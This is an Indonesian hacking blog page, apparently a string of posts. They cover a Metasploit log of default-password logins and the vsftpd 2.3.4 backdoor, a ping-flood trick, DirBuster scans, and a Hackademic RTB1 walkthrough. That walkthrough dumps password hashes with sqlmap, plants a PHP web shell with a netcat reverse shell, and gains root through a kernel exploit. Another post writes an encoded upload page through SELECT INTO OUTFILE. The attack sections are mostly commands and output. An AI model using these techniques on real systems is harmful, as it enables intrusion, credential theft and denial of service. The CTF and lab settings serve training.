[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'password'

[-] Remote-IP-Address:5432 Postgres - [11/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [12/21] - Trying username:'' with password:'admin' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'admin'

[-] Remote-IP-Address:5432 Postgres - [12/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [13/21] - Trying username:'scott' with password:'tiger' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'tiger'

[-] Remote-IP-Address:5432 Postgres - [13/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [14/21] - Trying username:'scott' with password:'postgres' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'postgres'

[-] Remote-IP-Address:5432 Postgres - [14/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [15/21] - Trying username:'scott' with password:'password' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'password'

[-] Remote-IP-Address:5432 Postgres - [15/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [16/21] - Trying username:'scott' with password:'admin' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'admin'

[-] Remote-IP-Address:5432 Postgres - [16/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [17/21] - Trying username:'admin' with password:'tiger' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'tiger'

[-] Remote-IP-Address:5432 Postgres - [17/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [18/21] - Trying username:'admin' with password:'postgres' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'postgres'

[-] Remote-IP-Address:5432 Postgres - [18/21] - Username/Password failed.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(postgres_login) >

root@bt:~# psql -h Remote-IP-Address -U postgres -W

Password for user postgres: postgres

psql (8.4.8, server 8.3.1)

WARNING: psql version 8.4, server version 8.3.

Some psql features might not work.

SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)

Type "help" for help.

postgres=#

----------------------------------------------------------------------------------

port 25 - smtp

root@bt:~# nmap --script smtp-enum-users.nse -p 25,465,587 IP-Address

Starting Nmap 6.01 ( http://nmap.org ) at 1421-11-21 09:57 GMT

Nmap scan report for IP-Address

Host is up (0.00082s latency).

PORT STATE SERVICE

25/tcp open smtp

| smtp-enum-users:

| root

| admin

| administrator

| webadmin

| sysadmin

| netadmin

| guest

| user

| web

|_ test

465/tcp closed smtps

587/tcp closed submission

MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

----------------------------------------------------------------------------------

port 3306 - mysql (linux)

root@bt:/usr/local/share/nmap/scripts# nmap -p 3306 --script mysql-empty-password.nse External-IP-Address

Starting Nmap 6.25 ( http://nmap.org ) at 1741-01-04 17:19 GMT

Nmap scan report for External-IP-Address

Host is up (0.00053s latency).

PORT     STATE SERVICE

3306/tcp open  mysql

| mysql-empty-password:

|_  root account has empty password

MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds

root@bt:/usr/local/share/nmap/scripts# mysql --host=External-IP-Address

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 13

Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;

+--------------------+

| Database           |

+--------------------+

| information_schema |

| dvwa               |

| metasploit         |

| mysql              |

| owasp10            |

| tikiwiki           |

| tikiwiki195        |

+--------------------+

7 rows in set (0.01 sec)

mysql> use dvwa;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;

+----------------+

| Tables_in_dvwa |

+----------------+

| guestbook      |

| users          |

+----------------+

2 rows in set (0.01 sec)

mysql> SELECT * FROM users;

+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+

| user_id | first_name | last_name | user    | password                         | avatar                                               |

+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/admin.jpg   |

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | http://IP-Address/dvwa/hackable/users/gordonb.jpg |

|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | http://IP-Address/dvwa/hackable/users/1337.jpg    |

|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://IP-Address/dvwa/hackable/users/pablo.jpg   |

|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/smithy.jpg  |

+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+

5 rows in set (0.00 sec)

mysql>

mysql>

mysql> use owasp10

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;

+-------------------+

| Tables_in_owasp10 |

+-------------------+

| accounts |

| blogs_table |

| captured_data |

| credit_cards |

| hitlog |

| pen_test_tools |

+-------------------+

6 rows in set (0.00 sec)

mysql> SELECT * FROM accounts;

+-----+----------+--------------+-----------------------------+----------+

| cid | username | password | mysignature | is_admin |

+-----+----------+--------------+-----------------------------+----------+

| 1 | admin | adminpass | Monkey! | TRUE |

| 2 | adrian | somepassword | Zombie Films Rock! | TRUE |

| 3 | john | monkey | I like the smell of confunk | FALSE |

| 4 | jeremy | password | d1373 1337 speak | FALSE |

| 5 | bryce | password | I Love SANS | FALSE |

| 6 | samurai | samurai | Carving Fools | FALSE |

| 7 | jim | password | Jim Rome is Burning | FALSE |

| 8 | bobby | password | Hank is my dad | FALSE |

| 9 | simba | password | I am a cat | FALSE |

| 10 | dreveil | password | Preparation H | FALSE |

| 11 | scotty | password | Scotty Do | FALSE |

| 12 | cal | password | Go Wildcats | FALSE |

| 13 | john | password | Do the Duggie! | FALSE |

| 14 | kevin | 42 | Doug Adams rocks | FALSE |

| 15 | dave | set | Bet on S.E.T. FTW | FALSE |

| 16 | ed | pentest | Commandline KungFu anyone? | FALSE |

+-----+----------+--------------+-----------------------------+----------+

16 rows in set (0.18 sec)

mysql>

----------------------------------------------------------------------------------

port 21 - FTP (linux)

root@bt:~# nmap -sC -sT -v IP-Address

PORT STATE SERVICE

21/tcp open ftp

|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

------------------------------------------------

msf auxiliary(vnc_login) > use auxiliary/scanner/ftp/ftp_version

msf auxiliary(ftp_version) > set rhosts IP-Address

msf auxiliary(ftp_version) > run

[*] IP-Address:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

------------------------------------------------

msf auxiliary(ftp_version) > search vsFTPd

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution

------------------------------------------------

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > set rhost IP-Address

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)

[*] USER: 331 Please specify the password.

[+] Backdoor service has been spawned, handling...

[+] UID: uid=0(root) gid=0(root)

[*] Found shell.

[*] Command shell session 1 opened (IP-Address:44113 -> IP-Address:6200) at 1421-01-12 01:45:51 +0000

ls -l

drwxr-xr-x 2 root root 4096 May 13 1421 bin

drwxr-xr-x 4 root root 1024 May 13 1421 boot

lrwxrwxrwx 1 root root 11 Apr 28 1421 cdrom -> media/cdrom

drwxr-xr-x 14 root root 13480 Jan 25 05:46 dev

drwxr-xr-x 95 root root 4096 Jan 25 05:47 etc

drwxr-xr-x 6 root root 4096 Apr 16 1421 home

Read more

1 Serap Bandwitch Wifi menggunakan CMD.exe

>Tekan LogoWin+R di keyboard ketik Cmd
>Masukkan perintah >ipconfig/all

> Kemudian cari tulisan DNS Servers,hafalkan no yang ada disebelahnya

 

>Open new CMD.exe jalankan perintah >ping -L 1000 192.168.1.1 -t

(192.168.1.1 adalah DNS Servers) (1000 bisa diganti sesuai selera anda)

 

>maka setelah kita tekan enter,proses penyerapan akan berlangsung. seperti gambar dibawah.

 

 

 

Terima Kasih,Semoga Bermanfaat.

Read more

0 Scan Admin Login menggunakan Disbuster

> Open new terminal #dirbuster
>Masukkan URL+Port target

>Pilih Select Scanning type
 # List based brute forse ( Menggunakan Wordlist )
 # Pure Brute forse ( Langsung exsekusi )

>Jika ingin menggunakan Wordlist. pilih file system

 

>Pilih browse usr/share/dirbuster/wordlists/directory-lish-2.3-medium.txt | Start

 

>Jika kalian beruntung,maka ditampilkan lokasi login adminny

 Sekian Terima Kasih. Semoga bermanfaat

Read more

0 Penyelesaian Hackademic_RTB1

>Pertama install Servernya di v-box ato v-mware jg bisa

>jika selesai open new terminal kita scan ip nya. dengan perintah

#netdiscover -i wlan0 -r 192.168.1.0/24 (wlan0nya bisa di ganti dengan eth0.karena ane pake di jaringan wirelles jadi gunakan wlan0)

>setelah discan kita temukan bahwa ipnya adalah 192.168.1.104 . copy ip tersebut ke URL browser kalian.

>klik tulisan Hackademic.RTB1 kemudian klik lagi tulisan Uncategorized (yg ada dibawahnya). liat alamat URLnya berubah menjadi http://192.168.1.104/Hackademic_RTB1/?cat=1 

>selanjutnya copy url tersebuat buka terminal kalian jalankan sqlmap. dengan perintah

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 --dbs

(hasilnya)

available databases [3]:

[*] information_schema

[*] mysql

[*] wordpress

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress --tables

(hasilnya)

Database: wordpress

[9 tables]

+-------------------+

| wp_categories     |

| wp_comments       |

| wp_linkcategories |

| wp_links          |

| wp_options        |

| wp_post2cat       |

| wp_postmeta       |

| wp_posts          |

| wp_users          |

+-------------------+

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns

(hasilnya)

Database: wordpress

Table: wp_users

[22 columns]

+---------------------+---------------------+

| Column              | Type                |

+---------------------+---------------------+

| ID                  | bigint(20) unsigned |

| user_activation_key | varchar(60)         |

| user_aim            | varchar(50)         |

| user_browser        | varchar(200)        |

| user_description    | longtext            |

| user_domain         | varchar(200)        |

| user_email          | varchar(100)        |

| user_firstname      | varchar(50)         |

| user_icq            | int(10) unsigned    |

| user_idmode         | varchar(20)         |

| user_ip             | varchar(15)         |

| user_lastname       | varchar(50)         |

| user_level          | int(2) unsigned     |

| user_login          | varchar(60)         |

| user_msn            | varchar(100)        |

| user_nicename       | varchar(50)         |

| user_nickname       | varchar(50)         |

| user_pass           | varchar(64)         |

| user_registered     | datetime            |

| user_status         | int(11)             |

| user_url            | varchar(100)        |

| user_yim            | varchar(50)         |

+---------------------+---------------------+

# sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users -C user_login,user_pass --dump

(hasilnya)

Database: wordpress

Table: wp_users

[6 entries]

+---------------------------------------------+--------------+

| user_pass                                   | user_login   |

+---------------------------------------------+--------------+

| 21232f297a57a5a743894a0e4a801fc3 (admin)    | NickJames    |

| 50484c19f1afdaf3841a0d821ed393d2 (kernel)   | MaxBucky     |

| 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   | GeorgeMiller |

| 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  | JasonKonnors |

| a6e514f9486b83cb53d8d932f9a04292 (napoleon) | TonyBlack    |

| b986448f0bb9e5e124ca91d3d650f52c            | JohnSmith    |

+---------------------------------------------+--------------+

========================================================================

buka browser

login ke http://192.168.1.104/Hackademic_RTB1/wp-admin

login menggunakan super user GeorgeMiller | q1w2e3

login dshborad > klik OPTION > klik Miscellaneous > klik conteng ALLOW UPLOAD > pada kolom Miscellaneous tambah extension php

klik UPDATE OPTION

======================================================

klik TAB UPLOAD untuk mengupload backdoor

download backdoor

1. upload shell.php 

catat URL nya <a href='/Hackademic_RTB1/wp-content/shell.php' title=''></a>

buka browser http://99.99.99.7/Hackademic_RTB1/wp-content/shell.php

tampilkan shell

2. upload bekonek.php ke folder /var/www/html/hekdemik/wp-conten/

kemudian edit file bekonek.php ganti dengan IP kali-linux

3. jalankan di terminal nc -lvvp 443

4. jalankan bekonek.php dari browser

http://99.99.99.7/Hackademic_RTB1/wp-content/bekonek.php

5. jalan di terminal whoami

id (enter)

uname -a (enter)

6. upload exploit.c ke wp-content

dari terminal masuk ke /var/www/html/Hackademic_RTB1/wp-content

jalankan perintah sh-4.0$ gcc exploit.c -o sploit

akan muncul file spoit

7. jalan perintah

sh-4.0$ ./sploit

./sploit

[*] Linux kernel >= 2.6.30 RDS socket exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses...

 [+] Resolved security_ops to 0xc0aa19ac

 [+] Resolved default_security_ops to 0xc0955c6c

 [+] Resolved cap_ptrace_traceme to 0xc055d9d7

 [+] Resolved commit_creds to 0xc044e5f1

 [+] Resolved prepare_kernel_cred to 0xc044e452

[*] Overwriting security ops...

[*] Linux kernel >= 2.6.30 RDS socket exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses...

 [+] Resolved security_ops to 0xc0aa19ac

 [+] Resolved default_security_ops to 0xc0955c6c

 [+] Resolved cap_ptrace_traceme to 0xc055d9d7

 [+] Resolved commit_creds to 0xc044e5f1

 [+] Resolved prepare_kernel_cred to 0xc044e452

[*] Overwriting security ops...

[*] Overwriting function pointer...

[*] Linux kernel >= 2.6.30 RDS socket exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses...

 [+] Resolved security_ops to 0xc0aa19ac

 [+] Resolved default_security_ops to 0xc0955c6c

 [+] Resolved cap_ptrace_traceme to 0xc055d9d7

 [+] Resolved commit_creds to 0xc044e5f1

 [+] Resolved prepare_kernel_cred to 0xc044e452

[*] Overwriting security ops...

[*] Overwriting function pointer...

[*] Triggering payload...

[*] Restoring function pointer...

whoami

root

id

uid=0(root) gid=0(root)

============================

Selesai. Semoga Bermanfaat

=======================================================

Read more

0 Upload Shell di Localhost

Disini saya melakukan injection pada localhost langkah awal masuk ke http://localhost/phpmyadmin/ setelah itu klik tab query di atas kiri lalu ketikkan show variables kemudian klik go,lalu cari Basedir

ket : no 1 ialah Tab Query, no 2 mengetikkan kata show variables untuk mencari Basedir

setelah di tekan go maka hasil yang keluar ialah ditemukannya basedir C:AppServ\MySQL\

ket : pada umumnya derectory selanjutnya kemungkinan htdoc,atau www.

jika telah ketemu maka langkah selanjutnya kita tinggal membuat page upload pada SQL dengan perintah

select 

0x3c3f706870206563686f20223c666f726d206d6574686f643d27

504f53542720656e63747970653d276d756c7469706172742f666f

726d2d64617461273e3c696e70757420747970653d2766696c652

7206e616d653d2766696c656c65272073697a653d273434273e3c

696e70757420747970653d277375626d6974273e3c2f666f726d3

e223b40636f707928245f46494c45535b2766696c656c65275d5b

27746d705f6e616d65275d2c245f46494c45535b2766696c656c6

5275d5b276e616d65275d293b3f3e 

into outfile 'c:/AppServ/www/upload.php'

perintah diatas kita copy paste kan pada Tab Query,lihat gambar dibawah

selanjutnya jika tlah terbuat page upload ny,silakan anda upload shell,dengan klik Telusuri dan Kirim Kuery.

ket : nama shell yang saya masukkan ialah user.php dan klik tombol open kemudian klik tombol Kirim Kueri maka shell saya akan tersimpan pada http://localhost/user.php dan shell telah terupload pada localhost korban.

Semoga menjadi ilmu tambahan buat kita semua. Terima Kasih.

Read more

0 Download Game Hacking

"Hacker Evolution Untold" bisa di download Disini

"HackThe Game" bisa di download Disini

"Hacker Id" bisa di download Disini

Semoga dengan adanya game-game di atas,bisa membuat kita termotivasi untuk menggeluti hal* di bidang Hacking. Terima Kasih.

Read more

0 Pembahasan Soal CTF LEVEL 1 (CYBER DEFENCE COMPETITION)

CLUE

#Tahun Ini 
#Hasil dari 333+333= 
#Nomor Pesawat MALAYSIA AIRLINES yang Hilang

printf
 
DQoNCmRlZiBtb2RleHAoYmFzZSwgcG93LCBtb2
QpOg0KDQogIGV4cG9uZW50ID0gMw0KDQogIGkgPS
AwDQoNCiAgd2hpbGUgaSA8IHBvdzoNCg0KICAgIG
V4cG9uZW50ID0gKGV4cG9uZW50ICogYmFzZSkgJS
Btb2QNCg0KICAgIGkgKz0gMw0KDQogIHJldHVybi
BleHBvbmVudA0KDQogDQoNCmlmIF9fbmFtZV9fID
09ICJfX21haW5fXyI6DQoNCiAgaW1wb3J0IHN5cw
0KDQogIHByaW50IG1vZGV4cChpbnQoc3lzLmFyZ3
ZbMV0pLCBpbnQoc3lzLmFyZ3ZbMl0pLCBpbnQoc3
lzLmFyZ3ZbM10pKQ0KDQogIA0KDQojRmxhZyA6DQoNCg

Tugas kita ialah mencari sebuah flag dari clue yang terdapat diatas.
saya disini menggunakan distro KALI LINUX untuk menemukan flagnya.

Pertama buka terminal ketikan perintah
#echo DQoNCmRlZiBtb2RleHAoYmFzZSwgcG93LCBtb2QpOg0KDQogIGV4cG9uZW50ID0gMw0KDQogIGkgPS
AwDQoNCiAgd2hpbGUgaSA8IHBvdzoNCg0KICAgIGV4cG9uZW50ID0gKGV4cG9uZW50ICogYmFzZSkgJSBtb2QNCg0KICAgIGkgKz0gMw0KDQogIHJldHVybi
BleHBvbmVudA0KDQogDQoNCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6DQoNCiAgaW1wb3J0IHN5cw0KDQogIHByaW50IG1vZGV4cChpbnQoc3lzLmFyZ3
ZbMV0pLCBpbnQoc3lzLmFyZ3ZbMl0pLCBpbnQoc3lzLmFyZ3ZbM10pKQ0KDQogIA0KDQojRmxhZyA6DQoNCg | base64 -d > Kytsumaru.py 

Read more